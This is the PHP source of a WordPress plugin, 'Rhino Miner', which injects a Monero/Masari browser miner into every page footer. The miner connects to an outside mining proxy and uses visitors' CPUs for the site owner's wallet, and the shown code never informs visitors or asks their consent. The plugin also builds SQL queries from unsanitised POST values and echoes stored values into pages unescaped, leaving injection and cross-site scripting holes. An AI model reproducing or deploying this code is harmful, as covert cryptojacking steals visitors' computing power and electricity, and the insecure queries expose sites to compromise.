<?php
/**
 * Plugin Name: Rhino Miner
 * Plugin URI: https://monerominer.rocks
 * Description: Earn crypto from your users.
 * Version: 1.2.0
 */

register_activation_hook( __FILE__, 'rm_miner_install' );
add_action( 'admin_menu', 'register_menu' );
add_action( 'wp_footer', 'add_miner' );

function rm_miner_install() {
	global $wpdb;

	$sql             = '';
	$update_wallets  = false;
	$charset_collate = $wpdb->get_charset_collate();

	$table_name = $wpdb->prefix . 'rm_miner_coins';
	if ( $wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) == $table_name ) {
		$wpdb->query( "DELETE FROM `$table_name`" );
	}
    $sql .= "CREATE TABLE $table_name (
      id mediumint(9) NOT NULL AUTO_INCREMENT,
      created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
      coin_abbreviation tinytext NOT NULL,
      coin_name tinytext NOT NULL,
      active boolean DEFAULT 1 NOT NULL,
      PRIMARY KEY  (id)
    ) $charset_collate;";

	$table_name = $wpdb->prefix . 'rm_miner_pools';
	if ( $wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) == $table_name ) {
		$wpdb->query( "DELETE FROM `$table_name`" );
	}
    $sql .= "CREATE TABLE $table_name (
      id mediumint(9) NOT NULL AUTO_INCREMENT,
      created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
      updated datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
      coin_id tinytext NOT NULL,
      active boolean DEFAULT 1 NOT NULL,
      url text NOT NULL,
      url_pool text NOT NULL,
      port text NOT NULL,
      empty_password text NULL,
      algorithm text NOT NULL,
      website text NULL,
      PRIMARY KEY  (id)
    ) $charset_collate;";

	$table_name = $wpdb->prefix . 'rm_miner_wallets';
	if ( $wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) != $table_name ) {
		$sql            .= "CREATE TABLE $table_name (
          id mediumint(9) NOT NULL AUTO_INCREMENT,
          created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          updated datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          coin_id tinytext NOT NULL,
          name tinytext NOT NULL,
          short_code tinytext NOT NULL,
          address text NULL,
          wallet_url varchar(55) DEFAULT '' NOT NULL,
          PRIMARY KEY  (id)
        ) $charset_collate;";
		$update_wallets = true;
	} else {
	    $includes = [];
		$wallets = $wpdb->get_results( "SELECT * FROM " . $table_name . " GROUP BY short_code" );
		foreach (getWallets() as $value) {
		    $includes[] = $value['short_code'];
        }

		foreach ((array) $wallets as $key => $wallet) {
			// Remove not needed wallets.
		    if (!in_array($wallet->short_code, $includes)) {
			    $wpdb->query("DELETE FROM ".$table_name." WHERE short_code = '".$wallet->short_code."'");
            }

			// Fix for duplicate wallets.
			$id_check = $wallet->id;
			$dups     = $wpdb->get_results( "SELECT * FROM " . $table_name . " WHERE short_code = '" . $wallet->short_code . "' AND id != " . $id_check );
			foreach ( (array) $dups as $dkey => $dupe ) {
				$wpdb->query( "DELETE FROM " . $table_name . " WHERE id = '" . $dupe->id . "'" );
			}
		}
	}

	$table_name = $wpdb->prefix . 'rm_miner_client';
	if ( $wpdb->get_var( "SHOW TABLES LIKE '$table_name'" ) != $table_name ) {
		$sql .= "CREATE TABLE $table_name (
          id mediumint(9) NOT NULL AUTO_INCREMENT,
          created datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          updated datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
          active boolean DEFAULT 1 NOT NULL,
          pool_id tinytext NOT NULL,
          worker tinytext NULL,
          threads tinytext NOT NULL,
          throttle tinytext NOT NULL,
          PRIMARY KEY  (id)
        ) $charset_collate;";
	}

	require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
	dbDelta( $sql );

	$table_name = $wpdb->prefix . 'rm_miner_coins';
	foreach ( getCoins() as $key => $value ) {
		$wpdb->insert(
			$table_name,
			array(
				'created'           => current_time( 'mysql' ),
				'coin_abbreviation' => $value['coin_abbreviation'],
				'coin_name'         => $key
			)
		);
	}

	if ( $update_wallets ) {
		foreach ( getWallets() as $key => $value ) {
			$wpdb->insert(
				$wpdb->prefix . "rm_miner_wallets",
				array(
					'created'    => current_time( 'mysql' ),
					'coin_id'    => (int) $key,
					'name'       => $value['name'],
					'short_code' => $value['short_code'],
					'address'    => $value['address'],
					'wallet_url' => $value['wallet_url']
				)
			);
		}
		$wpdb->insert(
			$wpdb->prefix . "rm_miner_client",
			array(
				'created'  => current_time( 'mysql' ),
				'pool_id'  => 0,
				'active'   => 0,
				'threads'  => - 1,
				'throttle' => 60
			)
		);
	}

	foreach ( getPools() as $key => $value ) {
		$wpdb->insert(
			$wpdb->prefix . "rm_miner_pools",
			array(
				'created'        => current_time( 'mysql' ),
				'coin_id'        => $value['coin'],
				'url'            => $key,
				'url_pool'       => $value['url'],
				'port'           => $value['port'],
				'empty_password' => $value['emptypassword'] ? $value['emptypassword'] : '',
				'algorithm'      => $value['algorithm'],
                'website'        => $value['website']
			)
		);
	}
}

function register_menu() {
	add_menu_page(
		__( 'Miner', 'textdomain' ),
		'Miner',
		'manage_options',
		'rm-miner',
		'rm_miner_admin_page',
		plugins_url( 'rm-miner/images/icon.png' ),
		6
	);
	add_submenu_page(
		'rm-miner',
		__( 'Wallets', 'textdomain' ),
		'Wallets',
		'manage_options',
		'rm-wallets',
		'rm_wallets_page'
	);
	add_submenu_page(
		'rm-miner',
		__( 'Miner Settings', 'textdomain' ),
		'Settings',
		'manage_options',
		'rm-miner-settings',
		'rm_miner_settings_page'
	);
}

function rm_miner_admin_page() {
	global $wpdb;
	$pool_info = [];

	$table_name = $wpdb->prefix . "rm_miner_client";
	$client     = $wpdb->get_row( "SELECT * FROM $table_name" );

	if ( $client->pool_id ) {
		$table_name = $wpdb->prefix . "rm_miner_pools";
		$pool_info  = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $client->pool_id" );
	}
	?>
    <div class="wrap">
        <h1>Rhino Miner for WordPress</h1>
        <p>This plugin will allow you to utilize your user's CPU to mine Cryptocurrency through your website!</p>
        <hr/>
        <p>
            <b>
                Set Up
            </b>
        </p>
        <ol>
            <li>
                Set your wallet address on the <a href="<?php echo admin_url( 'admin.php?page=rm-wallets' ); ?>" target="_blank">Wallets</a> page.
            </li>
            <li>
                Configure your miner on the
                <a
                    href="<?php echo admin_url( 'admin.php?page=rm-miner-settings' ); ?>"
                    target="_blank">
                    Settings
                </a>
                page.
            </li>
        </ol>
        <hr/>
		<?php if ( $pool_info->url ) { ?>
            <p>
                <b>
                    Stats
                </b>
            </p>
            <ol>
                <li>
                    <a href="<?php echo $pool_info->website; ?>" target="_blank">Click here</a> to visit the pool.
                </li>
                <li>
                    Find the input to enter your wallet address.  Enter you wallet address and see the earnings.<br/>
                    Once a user on your website solves a hash you will start to see your earnings.<br/>
                    Depending on the pool speed and the network this could be a few mins.
                </li>
            </ol>
            <hr/>
		<?php } ?>
        <p>
            Have some suggestions?  Leave us a <a href="https://monerominer.rocks/contact/" target="_blank">note</a>!
        </p>
    </div>
	<?php
}

function rm_wallets_page() {
	global $wpdb;
	$message = '';

	if ( $_POST ) {
		foreach ( $_POST as $key => $value ) {
			if ( $key != 'submit' ) {
				$wpdb->update(
					$wpdb->prefix . "rm_miner_wallets",
					array(
						'address' => $value,
						'updated' => current_time( 'mysql' )
					),
					array( 'short_code' => $key )
				);
			}
			$message = 'Wallets updated.';
		}
	}

	$table_name = $wpdb->prefix . "rm_miner_wallets";
	$results    = $wpdb->get_results( "SELECT * FROM $table_name" );
	?>
    <div class="wrap">
        <h1>Wallets</h1>
		<?php
		if ( ! empty( $message ) ) {
			?>
            <div class="notice notice-success is-dismissible">
                <p><?php _e( $message, 'textdomain' ); ?></p>
            </div>
			<?php
		}
		?>
        <p>In order for the miner to work properly you
            will need to supply a wallet address so the pool can send you your earnings. All earnings will come directly
            from the pool that you choose to mine on.</p>
        <p>You will need to add the wallet address of the coin that you would like to mine.</p>
        <hr/>
        <form method="post">
            <div id="universal-message-container">
				<?php
				foreach ( $results as $result ) {
					echo '<div class="options">';
					echo '<p>';
					echo '<label><b>' . $result->name . '</b> - <a href="' . $result->wallet_url . '" target="_blank">Get Wallet</a></label>';
					echo '<br/>';
					echo '<input type="text" name="' . $result->short_code . '" value="' . $result->address . '" />';
					echo '</p>';
					echo '</div>';
				}
				submit_button();
				?>
        </form>
        <hr/>
        <p>
            <b>
                IMPORTANT:
            </b>
            All earnings and statistics from the pool are associated with the coins wallet address that you
            provide. Statistics from the pool do not carry over form one address to another. Each wallet address is
            treated as it's own entity.
        </p>
    </div>
	<?php
}

function rm_miner_settings_page() {
	global $wpdb;
	$message_success = '';
	$message_error   = '';

	if ( $_POST ) {
		$pool_id = $_POST['pool_id'];
		$wpdb->update(
			$wpdb->prefix . "rm_miner_client",
			array(
				'updated'  => current_time( 'mysql' ),
				'active'   => $_POST['active'],
				'pool_id'  => $pool_id,
				'worker'   => $_POST['worker'],
				'threads'  => $_POST['threads'],
				'throttle' => $_POST['throttle']
			),
			array( 'id' => 1 )
		);
		$message_success = "Miner updated";

		$table_name = $wpdb->prefix . "rm_miner_pools";
		$pool_info  = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $pool_id" );

		$table_name = $wpdb->prefix . "rm_miner_wallets";
		$coin       = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $pool_info->coin_id" );

		if ( empty( $coin->address ) ) {
			$message_error = "You do not have a wallet address associated with the coin " . $coin->name . ".  Please visit the <a href=\"" . admin_url( 'admin.php?page=rm-wallets' ) . "\">Wallets</a> page to add your wallet address for " . $coin->name . " coin.";
		}
	}

	$table_name = $wpdb->prefix . "rm_miner_pools";
	$pools      = $wpdb->get_results( "SELECT * FROM $table_name" );

	$table_name = $wpdb->prefix . "rm_miner_client";
	$client     = $wpdb->get_row( "SELECT * FROM $table_name" );
	?>
    <div class="wrap">
        <h1>Settings</h1>
		<?php
		if ( ! empty( $message_success ) ) {
			?>
            <div class="notice notice-success is-dismissible">
                <p><?php _e( $message_success, 'textdomain' ); ?></p>
            </div>
			<?php
		}
		if ( ! empty( $message_error ) ) {
			?>
            <div class="notice notice-error is-dismissible">
                <p><?php _e( $message_error, 'textdomain' ); ?></p>
            </div>
			<?php
		}
		?>
        <hr/>
        <form method="post">
            <div class="options">
                <p>
                    <label>
                        <b>
                            Miner Activation
                        </b>
                    </label>
                    <br/>
                    <input type="radio" <?php if ( $client->active == 1 ) {
						echo "checked";
					} ?> name="active" value="1"> On<br>
                    <input type="radio" <?php if ( $client->active == 0 ) {
						echo "checked";
					} ?> name="active" value="0"> Off<br>
                </p>
            </div>
            <div class="options">
                <p>
                    <label>
                        <b>
                            Pool
                        </b>
                    </label>
                    <br/>
                    <select name="pool_id">
						<?php foreach ( $pools as $pool ) { ?>
                            <option value="<?php echo $pool->id; ?>" <?php if ( $pool->id == $client->pool_id ) {
								echo "selected";
							} ?>><?php echo $pool->url; ?></option>
						<?php } ?>
                    </select>
                </p>
            </div>
            <div class="options">
                <p>
                    <label>
                        <b>
                            Threads
                        </b>
                    </label>
                    <br/>
                    <input required type="text" name="threads" value="<?php echo $client->threads; ?>"/>
                    <br/>
                    <i>The number of threads the miner uses. Use -1 for auto-config.</i>
                </p>
            </div>
            <div class="options">
                <p>
                    <label>
                        <b>
                            Worker Id
                        </b>
                    </label>
                    <br/>
                    <input type="text" name="worker" value="<?php echo $client->worker; ?>"/>
                    <br/>
                    <i>Name for miner.  The pool uses this as well.  This is handy if you have two websites and would like to tell them apart.</i>
                </p>
            </div>
            <div class="options">
                <p>
                    <label>
                        <b>
                            Throttle
                        </b>
                    </label>
                    <br/>
                    <input required type="text" name="throttle" value="<?php echo $client->throttle; ?>"/>
                    <br/>
                    <i>
                        If you set this value to 20, the cpu workload will be approx. 80% (for 1 thread / CPU).
                        <br/>Setting
                        this value to 100 will not fully disable the miner but still calculate hashes with 10% CPU
                        load.
                    </i>
                </p>
            </div>
			<?php submit_button(); ?>
        </form>
    </div>
	<?php
}

function add_miner() {
	global $wpdb;

	$table_name = $wpdb->prefix . "rm_miner_client";
	$client     = $wpdb->get_row( "SELECT * FROM $table_name" );

	if ( $client->active ) {
		$table_name = $wpdb->prefix . "rm_miner_pools";
		$pool       = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $client->pool_id" );

		$server = "wss://f.xmrminingproxy.com:8181";
		$file   = plugin_dir_url( __FILE__ ) . '/js/rm.js';

		$table_name = $wpdb->prefix . "rm_miner_wallets";
		$wallet     = $wpdb->get_row( "SELECT * FROM $table_name WHERE id = $pool->coin_id" );

		if ( $wallet && $pool ) {
			?>
            <script src="<?php echo $file; ?>"></script>
            <script>
                let pool = "<?php echo $pool->url; ?>";
                let wallet_address = "<?php echo $wallet->address; ?>";
                let password = "<?php echo $pool->empty_password ?>";
                let threads = "<?php echo $client->threads; ?>";
                let user = "<?php echo $client->worker; ?>";
                server = "<?php echo $server; ?>";
                startMining(pool, wallet_address, user, threads, password);
                throttleMiner = <?php echo $client->throttle; ?>;
            </script>
			<?php
		}
		?>
		<?php
	}
}

function getCoins() {
	$coins = array(
		'Monero' => array(
			'coin_abbreviation' => 'XMR'
		),
		'Masari' => array(
			'coin_abbreviation' => 'MSR'
		)
	);

	return $coins;
}

function getWallets() {
	$wallets = array(
		array(
			"wallet_url" => "https://mymonero.com/",
			"name"       => "Monero",
			"short_code" => "XMR",
			"address"    => ""
		),
		array(
			"wallet_url" => "https://getmasari.org/",
			"name"       => "Masari",
			"short_code" => "MSR",
			"address"    => ""
		)
	);

	return $wallets;
}

function getPools() {
	return array(
		'moneroocean.stream:100'      =>
			array(
				'coin'          => 1,
				'url'           => 'gulf.moneroocean.stream',
				'port'          => 80,
				'emptypassword' => 'x',
				'algorithm'     => 'cn',
                'website'       => 'https://moneroocean.stream/'
			),
		'moneroocean.stream'          =>
			array(
				'coin'          => 1,
				'url'           => 'gulf.moneroocean.stream',
				'port'          => 10001,
				'emptypassword' => 'x',
				'algorithm'     => 'cn',
				'website'       => 'https://moneroocean.stream/'
			),
		'masari.hashvault.pro'        =>
			array(
				'coin'          => 2,
				'url'           => 'pool.masari.hashvault.pro',
				'port'          => 80,
				'emptypassword' => 'x',
				'algorithm'     => 'cn/half',
				'website'       => 'https://masari.hashvault.pro/en/dashboard'
			)
	);
}